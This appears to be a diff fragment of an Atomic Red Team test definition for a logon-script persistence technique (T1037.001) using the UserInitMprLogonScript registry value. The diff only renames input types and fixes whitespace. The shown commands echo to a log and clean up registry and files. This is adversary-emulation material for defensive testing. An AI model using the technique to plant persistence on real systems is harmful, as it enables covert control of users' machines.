+    name: powershell
@@ -27,8 +27,8 @@ that can be viewed in the Registry Editor.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| script_path | Path to .bat file | String | %temp%&#92;art.bat|
-| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|
+| script_path | Path to .bat file | string | %temp%&#92;art.bat|
+| script_command | Command To Execute | string | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|


 #### Attack Commands: Run with `command_prompt`! 
@@ -11,11 +11,11 @@ atomic_tests:
  input_arguments:
    script_path:
      description: Path to .bat file
-      type: String
+      type: string
      default: '%temp%\art.bat'
    script_command:
      description: Command To Execute
-      type: String
+      type: string
      default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt
  executor:
    command: |
@@ -25,4 +25,4 @@ atomic_tests:
      REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
      del #{script_path} >nul 2>&1
      del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
-    name: command_prompt
+    name: command_prompt
--- a/Show More
+++ b/Show More